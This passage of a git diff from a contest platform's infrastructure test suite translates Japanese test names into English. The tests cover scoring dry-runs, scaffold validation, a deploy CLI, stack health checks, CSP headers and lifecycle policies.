+  it("hello-world: should include flag-kind scoring + template Outputs + cross-ref OK", () => {
     const r = runInspect({ problemId: "hello-world" });
     expect(r.ok).toBe(true);
     const text = r.lines.join("\n");
@@ -21,7 +21,7 @@ describe("runInspect (#951 sub #5)", () => {
     expect(text).toContain("Cross-ref:  OK");
   });
 
-  it("hello-world-battle: uptime-flat の endpoint registry を含むべき", () => {
+  it("hello-world-battle: should include the uptime-flat endpoint registry", () => {
     const r = runInspect({ problemId: "hello-world-battle" });
     expect(r.ok).toBe(true);
     const text = r.lines.join("\n");
@@ -30,7 +30,7 @@ describe("runInspect (#951 sub #5)", () => {
     expect(text).toContain("slot=api");
   });
 
-  it("microservice-migration-battle: portal slots + phases + disruptions を含むべき", () => {
+  it("microservice-migration-battle: should include portal slots + phases + disruptions", () => {
     const r = runInspect({ problemId: "microservice-migration-battle" });
     expect(r.ok).toBe(true);
     const text = r.lines.join("\n");
@@ -41,7 +41,7 @@ describe("runInspect (#951 sub #5)", () => {
     expect(text).toContain("(OK)");
   });
 
-  it("security-battle-royale: uptime-multi の probedSlots を含むべき", () => {
+  it("security-battle-royale: should include uptime-multi probedSlots", () => {
     const r = runInspect({ problemId: "security-battle-royale" });
     expect(r.ok).toBe(true);
     const text = r.lines.join("\n");
@@ -49,7 +49,7 @@ describe("runInspect (#951 sub #5)", () => {
     expect(text).toContain("probedSlots:");
   });
 
-  it("存在しない problemId は ok=false を返すべき", () => {
+  it("should return ok=false for non-existent problemId", () => {
     const r = runInspect({ problemId: "does-not-exist-12345" });
     expect(r.ok).toBe(false);
     expect(r.summary).toContain("not found");

--- a/infrastructure/test/scripts/participant-portal-runtime-config.test.ts
+++ b/infrastructure/test/scripts/participant-portal-runtime-config.test.ts
@@ -33,7 +33,7 @@ afterEach(() => {
 });
 
 describe("participant-portal-runtime-config (#1122)", () => {
-  it("mock mode の runtime-config を標準出力に生成すべき", () => {
+  it("should emit the mock-mode runtime-config to stdout", () => {
     const result = runConfig(["--cloud-mode", "mock", "--print"]);
     expect(result.status).toBe(0);
     const json = JSON.parse(result.stdout);
@@ -48,7 +48,7 @@ describe("participant-portal-runtime-config (#1122)", () => {
     expect(json.localstackEndpoint).toBeUndefined();
   });
 
-  it("localstack mode は localhost endpoint を正規化して出力すべき", () => {
+  it("localstack mode should normalize and output the localhost endpoint", () => {
     const result = runConfig([
       "--cloud-mode",
       "localstack",
@@ -64,7 +64,7 @@ describe("participant-portal-runtime-config (#1122)", () => {
     expect(json.localstackEndpoint).toBe("http://localhost:4566");
   });
 
-  it("localstack mode は localhost 以外の endpoint を拒否すべき", () => {
+  it("localstack mode should reject endpoints other than localhost", () => {
     const result = runConfig([
       "--cloud-mode",
       "localstack",
@@ -77,7 +77,7 @@ describe("participant-portal-runtime-config (#1122)", () => {
     expect(result.stderr).toContain("LocalStack endpoint must be http(s) localhost");
   });
 
-  it("backend mode は HTTPS の apiBaseUrl だけを受け付けるべき", () => {
+  it("backend mode should accept only HTTPS apiBaseUrl", () => {
     const ok = runConfig([
       "--cloud-mode",
       "real",
@@ -103,7 +103,7 @@ describe("participant-portal-runtime-config (#1122)", () => {
     expect(ng.stderr).toContain("--api-base-url must be HTTPS");
   });
 
-  it("--out 指定時は runtime-config.json を書き出すべき", () => {
+  it("should write runtime-config.json when --out is specified", () => {
     const dir = mkdtempSync(join(tmpdir(), "tc-runtime-config-"));
     tempDirs.push(dir);
     const out = join(dir, "runtime-config.json");

--- a/infrastructure/test/scripts/scaffolds-validate.test.ts
+++ b/infrastructure/test/scripts/scaffolds-validate.test.ts
@@ -46,13 +46,13 @@ describe("Problem scaffold templates", () => {
 
   const kinds = listKinds();
 
-  it("5 種の builtin kind の scaffold ディレクトリがすべて存在するべき", () => {
+  it("should have scaffold directories for all 5 builtin kinds", () => {
     const expected = ["attack-detection", "flag", "phased-polling", "uptime-flat", "uptime-multi"];
     expect(kinds).toEqual(expected);
   });
 
   for (const kind of kinds) {
-    it(`${kind}/metadata.json は CLI 置換後 SCHEMA.json に通るべき`, () => {
+    it(`\${kind}/metadata.json should pass SCHEMA.json after CLI substitution`, () => {
       const raw = readFileSync(join(TEMPLATES_ROOT, kind, "metadata.json"), "utf8");
       const substituted = applyPlaceholders(raw, "scaffold-smoke-test");
       const json = JSON.parse(substituted);
@@ -66,7 +66,7 @@ describe("Problem scaffold templates", () => {
       expect(ok).toBe(true);
     });
 
-    it(`${kind}/template.yaml が存在するべき`, () => {
+    it(`\${kind}/template.yaml should exist`, () => {
       const path = join(TEMPLATES_ROOT, kind, "template.yaml");
       expect(() => readFileSync(path, "utf8")).not.toThrow();
     });

--- a/infrastructure/test/scripts/scoring-dry-run.test.ts
+++ b/infrastructure/test/scripts/scoring-dry-run.test.ts
@@ -8,14 +8,14 @@ import { runDryRun } from "../../../scripts/tenkacloud-problem";
  */
 
 describe("scoring dry-run (#951 sub #3)", () => {
-  it("flag kind: 不正解で earned=0 すべき", () => {
+  it("flag kind: should set earned=0 on wrong answer", () => {
     const r = runDryRun({ problemId: "hello-world", submitted: "wrong" });
     expect(r.ok).toBe(true);
     expect(r.summary).toContain("不正解");
     expect(r.summary).toContain("earned=0");
   });
 
-  it("flag kind: hint 開示は penalty を引くべき (template に静的 Value が無いケースは expected null)", () => {
+  it("flag kind: should deduct penalty on hint reveal (expected null when template has no static Value)", () => {
     // hello-world は !Sub なので extractFlag は null を返す → submitted との一致は常に false
     const r = runDryRun({ problemId: "hello-world", submitted: "anything", revealHints: 1 });
     expect(r.ok).toBe(true);
@@ -31,7 +31,7 @@ describe("scoring dry-run (#951 sub #3)", () => {
     expect(r.summary).toContain("earned=1000");
   });
 
-  it("uptime-flat kind: 部分 fail の cycles で earned が下がるべき", () => {
+  it("uptime-flat kind: earned should drop on cycles with partial fail", () => {
     const r = runDryRun({ problemId: "hello-world-battle", cycles: 4, pattern: "ssff" });
     expect(r.ok).toBe(true);
     // 2 success cycles × 2 endpoints × 100 = 400 (failurePenalty=0)
@@ -47,14 +47,14 @@ describe("scoring dry-run (#951 sub #3)", () => {
 
   // Issue #951 sub #3 拡張: uptime-multi / phased-polling / attack-detection の dry-run 対応
 
-  it("uptime-multi kind: 全 success cycles で pointsAllOk × cycles を返すべき", () => {
+  it("uptime-multi kind: should return pointsAllOk × cycles for all-success cycles", () => {
     // security-battle-royale は uptime-multi、 pointsAllOk=100、 failurePenalty=0 想定
     const r = runDryRun({ problemId: "security-battle-royale", cycles: 5, pattern: "sssss" });
     expect(r.ok).toBe(true);
     expect(r.summary).toContain("earned=500");
   });
 
-  it("uptime-multi kind: 部分 fail で earned が下がるべき", () => {
+  it("uptime-multi kind: earned should drop on partial fail", () => {
     const r = runDryRun({ problemId: "security-battle-royale", cycles: 4, pattern: "ssff" });
     expect(r.ok).toBe(true);
     // 2 allOk × 100 = 200 (failurePenalty=0)
@@ -89,7 +89,7 @@ describe("scoring dry-run (#951 sub #3)", () => {
     expect(r.summary).toMatch(/phased-polling dry-run/);
   });
 
-  it("存在しない問題 id で ok=false を返すべき", () => {
+  it("should return ok=false for non-existent problem id", () => {
     const r = runDryRun({ problemId: "this-does-not-exist" });
     expect(r.ok).toBe(false);
     expect(r.summary).toContain("not found");

--- a/infrastructure/test/scripts/tenkacloud-lite.test.ts
+++ b/infrastructure/test/scripts/tenkacloud-lite.test.ts
@@ -51,7 +51,7 @@ function buildIO(opts: {
 }
 
 describe("tenkacloud-lite CLI (#778 ADR-016 Phase 4)", () => {
-  it("引数なし / help / -h / --help でヘルプを出して exit 0 を返すべき", async () => {
+  it("should print help and exit 0 on no-arg / help / -h / --help", async () => {
     for (const argv of [[], ["help"], ["-h"], ["--help"]]) {
       const { io, stdout } = buildIO({});
       const code = await main(argv, io);
@@ -66,7 +66,7 @@ describe("tenkacloud-lite CLI (#778 ADR-016 Phase 4)", () => {
     }
   });
 
-  it("未知の subcommand では exit 1 + stderr にメッセージ + help を出すべき", async () => {
+  it("should exit 1 + print a message to stderr + show help on unknown subcommand", async () => {
     const { io, stdout, stderr } = buildIO({});
     const code = await main(["frobnicate"], io);
     expect(code).toBe(1);
@@ -74,7 +74,7 @@ describe("tenkacloud-lite CLI (#778 ADR-016 Phase 4)", () => {
     expect(stdout.join("")).toContain("使い方:");
   });
 
-  it("up は prepare-source-bundle.sh と cdk deploy を順に inherit 呼びすべき", async () => {
+  it("up should invoke prepare-source-bundle.sh and cdk deploy in order via inherit", async () => {
     const { io, calls } = buildIO({
       inheritExitCode: 0,
       capture: () => ({ code: 0, stdout: "https://example.cloudfront.net", stderr: "" }),
@@ -103,7 +103,7 @@ describe("tenkacloud-lite CLI (#778 ADR-016 Phase 4)", () => {
     expect(deployCall.args).toContain("never");
   });
 
-  it("up は prepare-source-bundle.sh が non-zero で落ちたら cdk deploy を呼ばずに早期 return すべき", async () => {
+  it("up should early-return without calling cdk deploy when prepare-source-bundle.sh exits non-zero", async () => {
     // 1st spawn (= prepare-source-bundle.sh) で失敗させ、 2nd (= cdk deploy) は呼ばれないことを確認
     let firstCall = true;
     const calls: Array<{ cmd: string; args: readonly string[] }> = [];
@@ -127,14 +127,14 @@ describe("tenkacloud-lite CLI (#778 ADR-016 Phase 4)", () => {
     expect(calls[0]?.cmd).toBe("bash");
   });
 
-  it("up は cdk deploy が non-zero で落ちたら早期 return し AWS CLI を呼ばないべき", async () => {
+  it("up should early-return without calling AWS CLI when cdk deploy exits non-zero", async () => {
     const { io, calls } = buildIO({ inheritExitCode: 2 });
     const code = await main(["up"], io);
     expect(code).toBe(2);
     expect(calls.filter((c) => c.cmd === "aws")).toHaveLength(0);
   });
 
-  it("down は app stack を先に destroy → problem-deploy stack の順で呼ぶべき", async () => {
+  it("down should destroy the app stack first and then the problem-deploy stack", async () => {
     const { io, calls } = buildIO({ inheritExitCode: 0 });
     const code = await main(["down"], io);
     expect(code).toBe(0);
@@ -148,14 +148,14 @@ describe("tenkacloud-lite CLI (#778 ADR-016 Phase 4)", () => {
     }
   });
 
-  it("down は 1 回目の destroy が落ちたら 2 回目を呼ばずに同じ exit code を返すべき", async () => {
+  it("down should return the same exit code without calling the second destroy when the first one fails", async () => {
     const { io, calls } = buildIO({ inheritExitCode: 3 });
     const code = await main(["down"], io);
     expect(code).toBe(3);
     expect(calls.filter((c) => c.args.includes("destroy"))).toHaveLength(1);
   });
 
-  it("portal-url は問題 deploy stack の ParticipantPortalApiUrl output を describe-stacks で問い合わせるべき", async () => {
+  it("portal-url should query the problem-deploy stack's ParticipantPortalApiUrl output via describe-stacks", async () => {
     const { io, calls, stdout } = buildIO({
       capture: () => ({ code: 0, stdout: "https://portal.example.com\n", stderr: "" }),
     });
@@ -170,7 +170,7 @@ describe("tenkacloud-lite CLI (#778 ADR-016 Phase 4)", () => {
     expect(stdout.join("")).toContain("https://portal.example.com");
   });
 
-  it("console-url は AppPlane stack の ApplicationAdminConsoleUrl output を問い合わせるべき", async () => {
+  it("console-url should query the AppPlane stack's ApplicationAdminConsoleUrl output", async () => {
     const { io, calls, stdout } = buildIO({
       capture: () => ({ code: 0, stdout: "https://console.example.com\n", stderr: "" }),
     });
@@ -182,7 +182,7 @@ describe("tenkacloud-lite CLI (#778 ADR-016 Phase 4)", () => {
     expect(stdout.join("")).toContain("https://console.example.com");
   });
 
-  it("output が空文字なら not found を stderr に出して exit 1 を返すべき", async () => {
+  it("should print not found to stderr and return exit 1 when output is empty", async () => {
     const { io, stderr } = buildIO({
       capture: () => ({ code: 0, stdout: "  \n", stderr: "" }),
     });
@@ -191,7 +191,7 @@ describe("tenkacloud-lite CLI (#778 ADR-016 Phase 4)", () => {
     expect(stderr.join("")).toContain("not found");
   });
 
-  it("describe-stacks が non-zero で落ちたら NOT_DEPLOYED として status に出すべき", async () => {
+  it("should surface status as NOT_DEPLOYED when describe-stacks exits non-zero", async () => {
     const { io, stdout } = buildIO({
       capture: () => ({ code: 255, stdout: "", stderr: "Stack does not exist" }),
     });
@@ -204,7 +204,7 @@ describe("tenkacloud-lite CLI (#778 ADR-016 Phase 4)", () => {
     expect(text.match(/NOT_DEPLOYED/g)?.length).toBe(2);
   });
 
-  it("status は describe-stacks 結果を 1 行ずつ標準出力に出すべき", async () => {
+  it("status should print describe-stacks results one line at a time to stdout", async () => {
     const { io, stdout } = buildIO({
       capture: (_cmd, args) => {
         const stackName = args[args.indexOf("--stack-name") + 1];
@@ -241,7 +241,7 @@ describe("tenkacloud-lite CLI (#778 ADR-016 Phase 4)", () => {
       }
     }
 
-    it("TENANT_ADMIN_EMAIL が空でも deploy は通り、 admin-create-user は呼ばないべき", async () => {
+    it("should let deploy pass without calling admin-create-user when TENANT_ADMIN_EMAIL is empty", async () => {
       delete process.env.TENANT_ADMIN_EMAIL;
       delete process.env.SYSTEM_ADMIN_EMAIL;
       try {
@@ -259,7 +259,7 @@ describe("tenkacloud-lite CLI (#778 ADR-016 Phase 4)", () => {
       }
     });
 
-    it("TENANT_ADMIN_EMAIL が設定されているとき、 describe-user-pool-domain → admin-get-user → admin-create-user の順で呼ぶべき", async () => {
+    it("should call describe-user-pool-domain → admin-get-user → admin-create-user in order when TENANT_ADMIN_EMAIL is set", async () => {
       process.env.TENANT_ADMIN_EMAIL = "admin@example.com";
       try {
         let capturedDomain: string | undefined;
@@ -305,7 +305,7 @@ describe("tenkacloud-lite CLI (#778 ADR-016 Phase 4)", () => {
       }
     });
 
-    it("admin-get-user が成功すれば既存 user として admin-create-user を呼ばないべき (idempotent)", async () => {
+    it("should not call admin-create-user when admin-get-user succeeds (idempotent)", async () => {
       process.env.TENANT_ADMIN_EMAIL = "admin@example.com";
       try {
         const { io, calls } = buildIO({
@@ -339,7 +339,7 @@ describe("tenkacloud-lite CLI (#778 ADR-016 Phase 4)", () => {
       }
     });
 
-    it("TENANT_ADMIN_EMAIL 未設定でも SYSTEM_ADMIN_EMAIL があれば fallback すべき", async () => {
+    it("should fall back to SYSTEM_ADMIN_EMAIL when TENANT_ADMIN_EMAIL is unset", async () => {
       delete process.env.TENANT_ADMIN_EMAIL;
       process.env.SYSTEM_ADMIN_EMAIL = "system@example.com";
       try {

--- a/infrastructure/test/scripts/tenkacloud-ops.test.ts
+++ b/infrastructure/test/scripts/tenkacloud-ops.test.ts
@@ -37,7 +37,7 @@ function makeIO(spawnResults: SpawnCaptureResult[]): {
 }
 
 describe("tenkacloud-ops (#952 AI ops scaffold)", () => {
-  it("ヘルプ表示は exit 0 で usage を返すべき", async () => {
+  it("help should return usage with exit 0", async () => {
     const { io, stdout } = makeIO([]);
     const code = await main(["help"], io);
     expect(code).toBe(0);
@@ -45,21 +45,21 @@ describe("tenkacloud-ops (#952 AI ops scaffold)", () => {
     expect(stdout.join("")).toContain("Usage:");
   });
 
-  it("引数なしは help を表示するべき", async () => {
+  it("should show help when called with no arguments", async () => {
     const { io, stdout } = makeIO([]);
     const code = await main([], io);
     expect(code).toBe(0);
     expect(stdout.join("")).toContain("Usage:");
   });
 
-  it("未知 subcommand は exit 1 でエラーメッセージを stderr に出すべき", async () => {
+  it("should print an error message to stderr and exit 1 on unknown subcommand", async () => {
     const { io, stderr } = makeIO([]);
     const code = await main(["bogus-cmd"], io);
     expect(code).toBe(1);
     expect(stderr.join("")).toContain("unknown command");
   });
 
-  it("health: 全 stack 健全なら exit 0 すべき", async () => {
+  it("health: should exit 0 when all stacks are healthy", async () => {
     const { io, stdout } = makeIO([
       {
         code: 0,
@@ -132,7 +132,7 @@ describe("tenkacloud-ops (#952 AI ops scaffold)", () => {
     expect(stderr.join("")).toContain("credentials expired");
   });
 
-  it("health --region us-east-1 が aws CLI 引数に渡るべき", async () => {
+  it("should pass health --region us-east-1 through to aws CLI arguments", async () => {
     let capturedArgs: readonly string[] | null = null;
     const io: CliIO = {
       stdout: () => {},
@@ -150,7 +150,7 @@ describe("tenkacloud-ops (#952 AI ops scaffold)", () => {
 });
 
 describe("runHealth helpers", () => {
-  it("buildListStacksArgs: region 未指定なら --region を付けず status filter は完全に揃うべき", () => {
+  it("buildListStacksArgs: should omit --region when not specified and keep the status filter intact", () => {
     const args = buildListStacksArgs();
     expect(args).toContain("cloudformation");
     expect(args).toContain("list-stacks");
@@ -164,13 +164,13 @@ describe("runHealth helpers", () => {
     expect(args).not.toContain("--region");
   });
 
-  it("buildListStacksArgs: region 指定で --region <r> を末尾に追加すべき", () => {
+  it("buildListStacksArgs: should append --region <r> when region is specified", () => {
     const args = buildListStacksArgs("ap-northeast-1");
     expect(args[args.length - 2]).toBe("--region");
     expect(args[args.length - 1]).toBe("ap-northeast-1");
   });
 
-  it("parseStackSummariesJson: 正常 JSON は StackSummaries を返すべき", () => {
+  it("parseStackSummariesJson: should return StackSummaries on normal JSON", () => {
     const out = parseStackSummariesJson(
       JSON.stringify({
         StackSummaries: [{ StackName: "tenkacloud-x", StackStatus: "CREATE_COMPLETE" }],
@@ -182,17 +182,17 @@ describe("runHealth helpers", () => {
     });
   });
 
-  it("parseStackSummariesJson: StackSummaries 不在は空配列を返すべき", () => {
+  it("parseStackSummariesJson: should return an empty array when StackSummaries is absent", () => {
     expect(parseStackSummariesJson("{}")).toEqual({ ok: true, stacks: [] });
   });
 
-  it("parseStackSummariesJson: 壊れた JSON は error を返すべき", () => {
+  it("parseStackSummariesJson: should return an error on broken JSON", () => {
     const out = parseStackSummariesJson("not json");
     expect(out.ok).toBe(false);
     if (!out.ok) expect(out.error).toMatch(/.+/);
   });
 
-  it("filterTenkaCloudStacks: 既知 prefix の stack だけを残すべき", () => {
+  it("filterTenkaCloudStacks: should keep only stacks with known prefixes", () => {
     const all: readonly CfnStackSummary[] = [
       { StackName: "tenkacloud-control-plane", StackStatus: "CREATE_COMPLETE" },
       { StackName: "serverless-saas-ref-arch-pooled", StackStatus: "CREATE_COMPLETE" },
@@ -207,7 +207,7 @@ describe("runHealth helpers", () => {
     ]);
   });
 
-  it("classifyStacks: FAILED / ROLLBACK / IN_PROGRESS / その他で 3 bucket に振り分けるべき", () => {
+  it("classifyStacks: should sort stacks into 3 buckets (FAILED / ROLLBACK / IN_PROGRESS / others)", () => {
     const buckets = classifyStacks([
       { StackName: "a", StackStatus: "CREATE_COMPLETE" },
       { StackName: "b", StackStatus: "CREATE_FAILED" },

--- a/infrastructure/test/scripts/tenkacloud-problem-interactive.test.ts
+++ b/infrastructure/test/scripts/tenkacloud-problem-interactive.test.ts
@@ -55,7 +55,7 @@ afterEach(() => {
 });
 
 describe("ADR-012 Phase 6 / #954: runInteractive scaffolding", () => {
-  it("kind 番号 + ID + Enter (= category override 無し) で flag scaffold を生成するべき", async () => {
+  it("should generate the flag scaffold from kind number + ID + Enter (no category override)", async () => {
     const uniqueId = `test-iact-${Date.now().toString(36)}-flag`;
     const { prompts } = buildPrompts(["1", uniqueId, "", "Y"]);
     const out = join(REPO_ROOT, "problems/challenges", uniqueId);
@@ -74,7 +74,7 @@ describe("ADR-012 Phase 6 / #954: runInteractive scaffolding", () => {
     expect(metadata.scoring.kind).toBe("flag");
   });
 
-  it("kind 名 (= 番号でなく文字列) でも受け付けるべき", async () => {
+  it("should also accept the kind name (string, not number)", async () => {
     const uniqueId = `test-iact-${Date.now().toString(36)}-uflat`;
     const { prompts } = buildPrompts(["uptime-flat", uniqueId, "", "y"]);
     createdPaths.push(join(REPO_ROOT, "problems/battles", uniqueId));
@@ -84,7 +84,7 @@ describe("ADR-012 Phase 6 / #954: runInteractive scaffolding", () => {
     expect(created.category).toBe("Battle");
   });
 
-  it("category override (= Challenge を Battle に切替) を受け付けるべき", async () => {
+  it("should accept a category override (switching Challenge to Battle)", async () => {
     const uniqueId = `test-iact-${Date.now().toString(36)}-fbat`;
     const { prompts } = buildPrompts(["1", uniqueId, "Battle", "Y"]);
     createdPaths.push(join(REPO_ROOT, "problems/battles", uniqueId));
@@ -97,7 +97,7 @@ describe("ADR-012 Phase 6 / #954: runInteractive scaffolding", () => {
     expect(metadata.category).toBe("Battle");
   });
 
-  it("無効 kind 入力 → 再 prompt → 正しい入力で進むべき", async () => {
+  it("should re-prompt on invalid kind input and proceed when given correct input", async () => {
     const uniqueId = `test-iact-${Date.now().toString(36)}-retry`;
     const { prompts, script } = buildPrompts(["bogus", "9", "1", uniqueId, "", "Y"]);
     createdPaths.push(join(REPO_ROOT, "problems/challenges", uniqueId));
@@ -109,7 +109,7 @@ describe("ADR-012 Phase 6 / #954: runInteractive scaffolding", () => {
     expect(allOutput).toContain("無効");
   });
 
-  it("無効 problemId (= 大文字 / 短すぎ) は拒否され再 prompt されるべき", async () => {
+  it("should reject invalid problemId (uppercase / too short) and re-prompt", async () => {
     const uniqueId = `test-iact-${Date.now().toString(36)}-bad`;
     const { prompts } = buildPrompts(["1", "Bad-ID", "ab", uniqueId, "", "Y"]);
     createdPaths.push(join(REPO_ROOT, "problems/challenges", uniqueId));
@@ -118,7 +118,7 @@ describe("ADR-012 Phase 6 / #954: runInteractive scaffolding", () => {
     expect(created.outputDir).toContain(uniqueId);
   });
 
-  it("既存 problemId は拒否され再 prompt されるべき (= hello-world は既に repo に存在)", async () => {
+  it("should reject existing problemId and re-prompt (hello-world already in repo)", async () => {
     const uniqueId = `test-iact-${Date.now().toString(36)}-dup`;
     const { prompts, script } = buildPrompts(["1", "hello-world", uniqueId, "", "Y"]);
     createdPaths.push(join(REPO_ROOT, "problems/challenges", uniqueId));
@@ -128,7 +128,7 @@ describe("ADR-012 Phase 6 / #954: runInteractive scaffolding", () => {
     expect(script.output.join("\n")).toContain("既に存在");
   });
 
-  it("confirm が 'n' なら 生成せず throw すべき (= 中止)", async () => {
+  it("should throw without generating when confirm is 'n' (abort)", async () => {
     const uniqueId = `test-iact-${Date.now().toString(36)}-abort`;
     const { prompts } = buildPrompts(["1", uniqueId, "", "n"]);
 
@@ -148,7 +148,7 @@ describe("ADR-012 Phase 6 / #954: scaffold 副作用の隔離 sanity", () => {
   beforeEach(() => {
     beforeCount = createdPaths.length;
   });
-  it("test 間で createdPaths は afterEach により 0 にリセットされるべき", () => {
+  it("createdPaths should reset to 0 between tests via afterEach", () => {
     expect(beforeCount).toBe(0);
     // tmpdir に dummy ディレクトリを作って (= test infra の sanity)
     const dummy = mkdtempSync(join(tmpdir(), "tc-iact-"));

--- a/infrastructure/test/scripts/validate-problems-cross-ref.test.ts
+++ b/infrastructure/test/scripts/validate-problems-cross-ref.test.ts
@@ -17,22 +17,22 @@ const REPO_ROOT = new URL("../../../", import.meta.url).pathname;
 const VALIDATE_SCRIPT = join(REPO_ROOT, "scripts/validate-problems.ts");
 
 describe("validate-problems cross-ref check (#951 sub #2)", () => {
-  it("flagOutputKey が template.yaml Outputs に存在すれば includes() が true を返すべき", () => {
+  it("includes() should return true when flagOutputKey is present in template.yaml Outputs", () => {
     const yaml = `Outputs:\n  FlagValue:\n    Value: x\n`;
     expect(yaml.includes("FlagValue:")).toBe(true);
   });
 
-  it("flagOutputKey が Outputs に存在しないとき includes() が false を返すべき", () => {
+  it("includes() should return false when flagOutputKey is missing from Outputs", () => {
     const yaml = `Outputs:\n  SomeOtherKey:\n    Value: x\n`;
     expect(yaml.includes("ThisKeyDoesNotExist:")).toBe(false);
   });
 
-  it("endpoints[].default.key が Outputs に存在しないと検出されるべき", () => {
+  it("should detect when endpoints[].default.key is missing in Outputs", () => {
     const yaml = `Outputs:\n  ServiceUrl:\n    Value: https://example.com\n`;
     expect(yaml.includes("NonExistent:")).toBe(false);
   });
 
-  it("実 script (validate-problems.ts) が repo の problems/ で OK を返すべき", () => {
+  it("the real script (validate-problems.ts) should return OK on the repo's problems/", () => {
     const out = execSync(`bun run ${VALIDATE_SCRIPT}`, {
       encoding: "utf8",
       cwd: REPO_ROOT,

--- a/infrastructure/test/security/cloudfront-headers.test.ts
+++ b/infrastructure/test/security/cloudfront-headers.test.ts
@@ -27,14 +27,14 @@ describe("buildContentSecurityPolicy (pure helper)", () => {
     expect(csp).toContain("object-src 'none'");
   });
 
-  it("connectSrcAllowedOrigins を 'self' に追加するべき", () => {
+  it("should add connectSrcAllowedOrigins to 'self'", () => {
     const csp = buildContentSecurityPolicy({
       connectSrcAllowedOrigins: ["https://api.example.com", "https://auth.example.com"],
     });
     expect(csp).toContain("connect-src 'self' https://api.example.com https://auth.example.com");
   });
 
-  it("formActionAllowedOrigins を 'self' に追加するべき", () => {
+  it("should add formActionAllowedOrigins to 'self'", () => {
     const csp = buildContentSecurityPolicy({
       formActionAllowedOrigins: ["https://auth.example.com"],
     });
@@ -55,7 +55,7 @@ describe("buildContentSecurityPolicy (pure helper)", () => {
     expect(buildContentSecurityPolicy()).toContain("frame-ancestors 'none'");
   });
 
-  it("Issue #899: additionalScriptSrcs を script-src / style-src / connect-src に追加するべき", () => {
+  it("Issue #899: should add additionalScriptSrcs to script-src / style-src / connect-src", () => {
     const csp = buildContentSecurityPolicy({
       additionalScriptSrcs: ["https://cdn.jsdelivr.net"],
     });

--- a/infrastructure/test/source-bundle/lifecycle-policy.test.ts
+++ b/infrastructure/test/source-bundle/lifecycle-policy.test.ts
@@ -8,38 +8,38 @@ import { buildSourceBundleLifecyclePolicy } from "../../lib/source-bundle/lifecy
  * 読まれる。 builder は数値正規化 + default fallback + AWS API shape 構築を担う。
  */
 describe("buildSourceBundleLifecyclePolicy (Issue #1056)", () => {
-  it("config 未指定なら default (= 5 世代 / 1 日) で組み立てるべき", () => {
+  it("should build with defaults (5 versions / 1 day) when config is unset", () => {
     const policy = buildSourceBundleLifecyclePolicy(undefined);
     const [rule] = policy.Rules;
     expect(rule.NoncurrentVersionExpiration.NewerNoncurrentVersions).toBe(5);
     expect(rule.NoncurrentVersionExpiration.NoncurrentDays).toBe(1);
   });
 
-  it("config の number 値はそのまま AWS shape に流すべき", () => {
+  it("should pass config number values straight through to the AWS shape", () => {
     const config: SourceBundleConfig = { keepNoncurrentVersions: 10, expireAfterDays: 3 };
     const [rule] = buildSourceBundleLifecyclePolicy(config).Rules;
     expect(rule.NoncurrentVersionExpiration.NewerNoncurrentVersions).toBe(10);
     expect(rule.NoncurrentVersionExpiration.NoncurrentDays).toBe(3);
   });
 
-  it("placeholder 展開後の string 値も number に正規化すべき", () => {
+  it("should also normalize post-placeholder-expanded string values to numbers", () => {
     const config: SourceBundleConfig = { keepNoncurrentVersions: "7", expireAfterDays: "2" };
     const [rule] = buildSourceBundleLifecyclePolicy(config).Rules;
     expect(rule.NoncurrentVersionExpiration.NewerNoncurrentVersions).toBe(7);
     expect(rule.NoncurrentVersionExpiration.NoncurrentDays).toBe(2);
   });
 
-  it("Status は Enabled で固定すべき", () => {
+  it("Status should be fixed to Enabled", () => {
     const [rule] = buildSourceBundleLifecyclePolicy(undefined).Rules;
     expect(rule.Status).toBe("Enabled");
   });
 
-  it("Filter は空オブジェクトで bucket 全 object を対象とすべき", () => {
+  it("Filter should target all bucket objects via an empty object", () => {
     const [rule] = buildSourceBundleLifecyclePolicy(undefined).Rules;
     expect(rule.Filter).toEqual({});
   });
 
-  it("非整数 / 0 / 負値は throw すべき (= deploy 前に misconfig を検出)", () => {
+  it("should throw on non-integer / 0 / negative (detect misconfig before deploy)", () => {
     expect(() =>
       buildSourceBundleLifecyclePolicy({ keepNoncurrentVersions: 0, expireAfterDays: 1 }),
     ).toThrow();

--- a/infrastructure/test/tenant-pipeline/serverless-saas-pipeline.test.ts
+++ b/infrastructure/test/tenant-pipeline/serverless-saas-pipeline.test.ts
@@ -25,7 +25,7 @@ function synth(): Template {
 }
 
 describe("ServerlessSaaSPipeline runtimes", () => {
-  it("tenant pipeline の Python Lambda は最新 runtime を使うべき", () => {
+  it("tenant pipeline Python Lambda should use the latest runtime", () => {
     const tpl = synth();
     tpl.hasResourceProperties(
       "AWS::Lambda::Function",
@@ -43,7 +43,7 @@ describe("ServerlessSaaSPipeline runtimes", () => {
     );
   });
 
-  it("tenant provisioning CodeBuild は最新 standard image を使うべき", () => {
+  it("tenant provisioning CodeBuild should use the latest standard image", () => {
     const tpl = synth();
     tpl.hasResourceProperties(
       "AWS::CodeBuild::Project",
@@ -58,7 +58,7 @@ describe("ServerlessSaaSPipeline runtimes", () => {
 });
 
 describe("ServerlessSaaSPipeline state machine name", () => {
-  it("同一 account/region の複数 deploy で衝突しないよう app と environment を含めるべき", () => {
+  it("should include app and environment to avoid collisions on multiple deploys in the same account/region", () => {
     const tpl = synth();
     tpl.hasResourceProperties(
       "AWS::StepFunctions::StateMachine",

--- a/infrastructure/test/tenant-pipeline/tenant-lifecycle-scripts.test.ts
+++ b/infrastructure/test/tenant-pipeline/tenant-lifecycle-scripts.test.ts
@@ -15,7 +15,7 @@ describe("tenant lifecycle scripts", () => {
     "scripts/deprovision-tenant.sh",
   ];
 
-  it("tenant lifecycle scripts は legacy package runner を使わないべき", () => {
+  it("tenant lifecycle scripts should not use the legacy package runner", () => {
     const legacyPackageRunnerPattern = new RegExp(`\\b${"np"}x\\b`);
 
     for (const scriptPath of lifecycleScripts) {
@@ -23,7 +23,7 @@ describe("tenant lifecycle scripts", () => {
     }
   });
 
-  it("tenant lifecycle scripts は CDK を bun で実行すべき", () => {
+  it("tenant lifecycle scripts should run CDK via bun", () => {
     expect(readRepoFile("scripts/provision-tenant.sh")).toContain(
       'bun cdk deploy "$STACK_NAME" --require-approval never',
     );
@@ -37,7 +37,7 @@ describe("tenant lifecycle scripts", () => {
     );
   });
 
-  it("CodeBuild runtime helper は packageManager の Bun を導入すべき", () => {
+  it("CodeBuild runtime helper should install the packageManager's Bun", () => {
     const helper = readRepoFile("scripts/lib/install-node.sh");
 
     expect(helper).toContain("packageManager");
@@ -45,7 +45,7 @@ describe("tenant lifecycle scripts", () => {
     expect(helper).toContain("install_bun_from_package_manager");
   });
 
-  it("deprovision script は runtime helper を source する前に source.zip を展開すべき", () => {
